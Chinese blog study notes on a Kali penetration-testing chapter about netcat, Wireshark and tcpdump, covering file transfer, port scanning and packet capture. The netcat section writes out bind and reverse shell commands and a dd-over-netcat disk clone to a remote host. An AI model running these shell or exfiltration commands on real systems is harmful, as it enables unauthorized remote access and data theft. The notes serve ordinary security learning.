标签:界面 src eth 克隆 测试 物理 print asc 身份认证
Kali渗透测试第五章笔记
第五章是基本工具的学习,主要包含了nc,wireshark,tcpdump三个工具的学习这是经常使用的强大工具。
一、 Netcat
Nc –nv 1.1.1.1 110 连接1.1.1.1的110端口
:传输文本信息
Nc –lp 4444 监听4444端口
Nc –nv 1.1.1.1 4444 连接1.1.1.1的4444监听端口
:传输文件/目录
Nc –lp 333 > 1.mp4 #监听333发送1.MP4
Nc –nv 1.1.1.1 333 < 1.mp4 –q 1 #接收1.MP4,接收完毕后1s退出 q:退出
Or
Nc –lp 333 < 1.mp4 –q 1
Nc –nv 1.1.1.1 333 > a.mp4
:传输目录
Tar –cvf –music/ | nc –lp 333 –q 1
Nc –nv 1.1.1.1 333 | tar –xvf –
:流媒体
Cat 1.mp4 | nc –lp 333
Nc –nv 1.1.1.1 333 | mplayer –vo x11 –cache 3000 –
:端口扫描
Nc –nvz 1.1.1.1 1-65535 tcp 端口
Nc –nvzu 1.1.1.1 1-1024 udp 端口
:远程克隆硬盘
Nc –lp 333 | dd of=/dev/sda
Dd if=/dev/sda | nc –nv 1.1.1.1 333 –q -1
:远程控制(windows把bash改成cmd)
Nc –lp 333 –c bash
Nc 1.1.1.1 333
Nc –lp 333
Nc 1.1.1.1 333 –c bash
:nc不能加密缺乏身份认证
解决办法
Ncat –c bash –allow 192.168.191.3 –vnl 333 –ssl
Ncat –nv 1.1.1.1 333 -ssl
二、 Wireshark
Wireshark 的使用
启动-选择网卡-混杂模式-实时抓包-分析-首选项
如今的wireshark有中文界面
WireShark 分层显示协议
物理层
数据链路层
网络层 ARP IP
传输层 TCP, UDP, ICMP
会话层
表示层
应用层
三、 Tcpdump
:抓包
tcpdump -i eth0 tcp 只抓TCP 包
Tcpdump –i eth0 –s 0 –w file.pcap #tcpdump默认抓取前68个字节,s代表size
:读取抓包
Tcpdump –r file.pcap
:筛选
tcpdump -A 是以 ASCII 码的形式打印包的详细内容
- -X 是以 十六进制的形式打印抓包的内容
显示筛选器:
-n 不做域名解析,直接显示IP地址
-r 读文件
awk ‘{print $3}‘ 打印第三列
sort -u 去重
tcpdump -n src host 1.1.1.1 -r file.pcap
tcpdump -n dst host 1.1.1.1 -r file.pcap
tcpdump -n tcp src port 80 -r file.pcap
标签:界面 src eth 克隆 测试 物理 print asc 身份认证
原文地址:https://www.cnblogs.com/neoxblog/p/8997608.html